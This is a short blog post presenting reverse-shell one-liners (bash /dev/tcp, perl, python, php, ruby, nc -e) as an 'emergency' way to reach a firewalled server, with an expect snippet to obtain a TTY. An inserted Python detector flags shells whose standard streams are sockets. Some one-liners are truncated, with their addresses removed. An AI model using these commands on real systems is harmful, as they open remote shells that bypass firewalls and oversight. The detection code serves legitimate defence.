Emergency reverse shell technique

18 Jun 2015 08:44 | security

Don't you just hate it when an emergency happens with an important server and
access from your location is firewalled?  Luckily if there's someone else local
to the machine who can execute commands for you, getting onto it is fairly

First make sure that the machine you're on can accept connections from the
internet on a TCP port (any).  Typically you'll need to map this through on
whatever firewall/router you've got on the local network.

Let's say your IP address is and you've mapped TCP port 13131.
Simply listen on the port with netcat:

$ nc -l 13131

then have someone on the remote machine run any of these:

bash -i >& /dev/tcp/ 0>&1

perl -e 'use

python -c 'import

php -r '$sock=fsockopen("",13131);exec("/bin/bash -i <&3 >&3

ruby -rsocket -e'f=TCPSocket.open("",13131).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/bash 13131

and hey presto, your netcat listener is now connected to the shell. Of course
the connection isn't encrypted, so you'll want to be careful what you type over
it, but for emergency use it's quite handy. The advantage over the obvious
choice for this (ssh) is that you don't have to give the person who's at the
server end any credentials to log into your machine with in order to set up the

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
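A defender's counterpart to the one-liners above, added here as an example that is not from the original post or from pentestmonkey: whichever interpreter starts it, each variant ends as an interactive shell whose standard streams are a TCP socket, and on Linux that shows up directly in /proc/<pid>/fd as "socket:[inode]" links. The SHELLS set, the constructed sample process table and its pids are assumptions for illustration; a full view of a live /proc needs root.

```python
import os
import re

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")

def is_socket_backed_shell(comm, fd_targets):
    """comm is /proc/<pid>/comm; fd_targets maps fd -> readlink of /proc/<pid>/fd/<fd>."""
    if comm not in SHELLS:
        return False
    return any(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))

def scan_proc(proc="/proc"):
    """Walk a live Linux /proc; returns pids of shells with stdin/stdout/stderr on a socket.
    Needs root to read other users' fd links; unreadable processes are skipped."""
    hits = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc}/{entry}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue  # process already exited
        targets = {}
        for fd in (0, 1, 2):
            try:
                targets[fd] = os.readlink(f"{proc}/{entry}/fd/{fd}")
            except OSError:
                pass  # fd closed, or not our process and we are not root
        if is_socket_backed_shell(comm, targets):
            hits.append(int(entry))
    return hits

# Constructed sample: (comm, fd links) as readlink would report them on Linux.
SAMPLE = {
    101: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),  # normal login shell
    202: ("bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),  # shell on a TCP socket
    303: ("sh", {0: "pipe:[9001]", 1: "pipe:[9001]", 2: "/dev/null"}),  # cron/script child
    404: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "socket:[12]"}),  # daemon, not a shell
}

def flagged(sample=SAMPLE):
    """Apply the check to a {pid: (comm, fd_targets)} mapping; returns sorted pids."""
    return sorted(pid for pid, (comm, fds) in sample.items() if is_socket_backed_shell(comm, fds))

if __name__ == "__main__":
    print("constructed sample:", flagged())  # → [202]
    print("live /proc:", scan_proc())
```

Socket-backed shells do occur legitimately (inetd/xinetd-style services or systemd socket activation that hand a connection straight to a shell), so treat hits as leads to compare against a baseline of the host rather than as verdicts.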


One limitation of this is that you won't have a tty, which makes many things
impossible or difficult.

However if expect is installed you can get one by dropping this into a file and
running it:

#!/usr/bin/expect -f
# Spawn a shell, then allow the user to interact with it.  The new shell will
# have a good enough TTY to run tools like ssh, su and login
spawn bash
interact

then you have a full tty and can run sudo, su, screen etc :)